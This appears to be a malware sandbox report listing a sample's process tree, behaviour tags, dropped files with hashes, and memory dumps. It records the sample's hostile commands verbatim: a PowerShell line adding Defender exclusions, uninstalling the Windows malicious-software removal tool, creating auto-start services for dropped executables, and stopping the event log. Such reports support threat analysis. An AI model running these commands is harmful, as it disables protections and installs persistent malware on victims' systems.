C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
3⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1556

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
3⤵
- Suspicious use of WriteProcessMemory
PID:2524

C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
4⤵
- Drops file in Windows directory
PID:2592

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "UPFRTHSI"
3⤵
- Launches sc.exe
PID:2812

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe create "UPFRTHSI" binpath= "C:\ProgramData\pehgyntafdrm\tubpxzvwmyfr.exe" start= "auto"
3⤵
- Launches sc.exe
PID:2796

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
3⤵
- Launches sc.exe
PID:308

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "UPFRTHSI"
3⤵
- Launches sc.exe
PID:1840

C:\Users\Admin\AppData\Local\Temp\Notepad.exe
"C:\Users\Admin\AppData\Local\Temp\Notepad.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2600

C:\Users\Admin\AppData\Local\Temp\Notepad.exe
"C:\Users\Admin\AppData\Local\Temp\Notepad.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2376

C:\Users\Admin\AppData\Local\Temp\mergedALL.exe
"C:\Users\Admin\AppData\Local\Temp\mergedALL.exe"
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2632

C:\Users\Admin\AppData\Local\Temp\etc test.exe
"C:\Users\Admin\AppData\Local\Temp\etc test.exe"
2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:2104

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
3⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2144

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
3⤵
- Suspicious use of WriteProcessMemory
PID:2996

C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
4⤵
- Drops file in Windows directory
PID:2888

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "OBKZWAPS"
3⤵
- Launches sc.exe
PID:2032

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe create "OBKZWAPS" binpath= "C:\ProgramData\rstywrmdprzs\esfowblknspo.exe" start= "auto"
3⤵
- Launches sc.exe
PID:2872

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
3⤵
- Launches sc.exe
PID:2148

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "OBKZWAPS"
3⤵
- Launches sc.exe
PID:268

C:\Users\Admin\AppData\Local\Temp\fix.exe
"C:\Users\Admin\AppData\Local\Temp\fix.exe"
2⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2396

C:\ProgramData\pehgyntafdrm\tubpxzvwmyfr.exe
C:\ProgramData\pehgyntafdrm\tubpxzvwmyfr.exe
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1912

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2548

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
2⤵
- Suspicious use of WriteProcessMemory
PID:2320

C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
3⤵
- Drops file in Windows directory
PID:768

C:\Windows\system32\conhost.exe
C:\Windows\system32\conhost.exe
2⤵
PID:2588

C:\Windows\system32\conhost.exe
conhost.exe
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1604

C:\ProgramData\rstywrmdprzs\esfowblknspo.exe
C:\ProgramData\rstywrmdprzs\esfowblknspo.exe
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:532

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:584

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
2⤵
- Suspicious use of WriteProcessMemory
PID:1248

C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
3⤵
- Drops file in Windows directory
PID:2256

C:\Windows\system32\conhost.exe
C:\Windows\system32\conhost.exe
2⤵
PID:2248

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
342B

MD5
0ffe01bfe1fbb6c8466c776a982d99c4

SHA1
3fc80f6c48bc2d6b91b72c4ff4d1a5b04aa91caa

SHA256
2705615a4c94d5f9ccd5d7964c8f6df91bb18712334942d22cfecc8b88fe1a2f

SHA512
9422628443fdbbed63987ef552569cc3acde53edda87671f783ddc80bfe744ac52fd1b4f99c6736f21d2e62085aa8749e5eb6050099cd149e7488b56b1fd9318

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab37B5.tmp
Filesize
65KB

MD5
ac05d27423a85adc1622c714f2cb6184

SHA1
b0fe2b1abddb97837ea0195be70ab2ff14d43198

SHA256
c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

SHA512
6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar38B6.tmp
Filesize
181KB

MD5
4ea6026cf93ec6338144661bf1202cd1

SHA1
a1dec9044f750ad887935a01430bf49322fbdcb7

SHA256
8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

SHA512
6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI26002\python312.dll
Filesize
6.7MB

MD5
550288a078dffc3430c08da888e70810

SHA1
01b1d31f37fb3fd81d893cc5e4a258e976f5884f

SHA256
789a42ac160cef98f8925cb347473eeeb4e70f5513242e7faba5139ba06edf2d

SHA512
7244432fc3716f7ef27630d4e8fbc8180a2542aa97a01d44dca260ab43966dd8ac98b6023400b0478a4809aace1a128f1f4d6e544f2e591a5b436fd4c8a9d723

Download Submit
C:\Users\Admin\AppData\Local\Temp\etc test.exe
Filesize
2.5MB

MD5
e4e8f85ee773cd79bd76dd7798baf957

SHA1
112f53467d2946f2bcf4c55bb4177f25120cda13

SHA256
a0a9aa62080c1a543e11e5853fcd6964e598b59a0a7c24de7a7f1d951177e564

SHA512
99a1dd206181ef20c572a1a1ed9354cc2f70424a4493cd2e67648b54483f90e0bf291764e4731943c6ed73ab872b3fa8410c0368295d5a025330792a17f19dad

Download Submit
C:\Users\Admin\AppData\Local\Temp\fix.exe
Filesize
95KB

MD5
1f327a277466f1bb04aa5cfcd279c0f7

SHA1
9bcb7bbac28992b9c7c35ba0573dce7db32ca18f

SHA256
e8432406bc918c6ce0d245a3bc5bb8c021b218593f94b5d09ebcda7e549f1fc0

SHA512
82c750475dc42d974c3fd33a4329bce7e99a5c15bf88fe4e802627b321b6c91f78e8be4b82e72380ee34c4de407878d17b18af26d7f5667104fdc55020f68a9d

Download Submit
C:\Users\Admin\AppData\Local\Temp\hamburger.exe
Filesize
2.5MB

MD5
09af9e57d30e6929c115811dfa9c3b7e

SHA1
caf9281f7001f92524005c60a34f33543315df52

SHA256
3b031ddbb05570ca3ffefa93abbd1cb2891897a34ea9b4a29612858b66a146f2

SHA512
023849985162db69160f559002586dbdb4148747f13fa1ff617e75b0f972c778f9f3d6a033dd3fb429d78aa3c20b264d83dc44274d6c0743a3ed1cf88fb045f8

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp400B.tmp
Filesize
46KB

MD5
02d2c46697e3714e49f46b680b9a6b83

SHA1
84f98b56d49f01e9b6b76a4e21accf64fd319140

SHA256
522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9

SHA512
60348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp4021.tmp
Filesize
92KB

MD5
bbe71b58e84c50336ee2d3bad3609c39

SHA1
bdd3227b48977e583127425cbc2f86ff4077ba10

SHA256
b25b7e57924b2382d3178696782b51fa62b68fa7e763081d7a53471cccc1ff3c

SHA512
07fcac6778f114fb372dac7ed489624b8e0aed347bc14af77ec36b5201df8b3d99e2a69a384756606030bb146f5c0780f39a274dc5a4b4f6863746ec7fa2ca2a

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\Y0ANJLHUCMIHBTS2SKPD.temp
Filesize
7KB

MD5
37848454b3bb8d1b900c03c90694b897

SHA1
a04057a76d236868ebabece8f4343e7f303ae15a

SHA256
a757abc55cf2dbc5a06958659a4df21bb6684cc386d46c4eee0c3ca2732d50b4

SHA512
3e577854181bf04d09f792b39dafcf964e6deb15d065d4348058fe4e52e2e77535238fa0a56994c227193a65033f83e59b6a120476aa2946ed52826f421946c1

Download Submit
\??\PIPE\srvsvc
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\Users\Admin\AppData\Local\Temp\Notepad.exe
Filesize
7.0MB

MD5
150f7378fd18d19ecc002761fa112de5

SHA1
a5ef247183d14dcd0d9b112306c1965c38720a1e

SHA256
b3bfd7d408a13096897fe8cbaff158cb8ff34f6d2d2269b25a1a268daeef387c

SHA512
dd3739f3e7736c6d6319dbf71346addfdab60d668c84b91d9c87bdf5ee7c6ea085b49a314c52338cb196cceb212067fdbf804da91d9f517a34e1b0978ceebb6d

Download Submit
\Users\Admin\AppData\Local\Temp\mergedALL.exe
Filesize
297KB

MD5
2359b2a186e08a38296305861dea4231

SHA1
41716e2710daaebba6f03d009064a149da90c526

SHA256
f36f4c7bfb509bcfc5cdfb6eb28149bfca1b6ab3eb001bf74ef1e35f5edce9d6

SHA512
6ebcb5f9c3b6d76c59221d1442d4c39cc7a1108ae7ef63f3173cff0fcb5356e622369d2925c0d1992aec3a2605641a69e44891c804d320cbe36e164705d19c54

Download Submit
memory/1556-233-0x0000000001CF0000-0x0000000001CF8000-memory.dmp

Filesize
32KB

Download
memory/1556-232-0x000000001B560000-0x000000001B842000-memory.dmp

Filesize
2.9MB

Download
memory/1604-258-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/1604-263-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/1604-264-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/1604-260-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/1604-259-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/1604-261-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/1604-262-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/1604-250-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/1604-254-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/1604-251-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/1604-256-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/1604-255-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/1604-253-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/1604-252-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/1604-257-0x00000000000B0000-0x00000000000D0000-memory.dmp

Filesize
128KB

Download
memory/2248-279-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/2248-281-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/2248-282-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/2248-276-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/2248-277-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/2248-278-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/2396-57-0x0000000000310000-0x000000000032E000-memory.dmp

Filesize
120KB

Download
memory/2548-240-0x00000000009D0000-0x00000000009D8000-memory.dmp

Filesize
32KB

Download
memory/2548-239-0x0000000019F90000-0x000000001A272000-memory.dmp

Filesize
2.9MB

Download
memory/2588-245-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/2588-244-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/2588-243-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/2588-242-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/2588-241-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/2588-247-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/2632-56-0x0000000000F30000-0x0000000000F80000-memory.dmp

Filesize
320KB

Download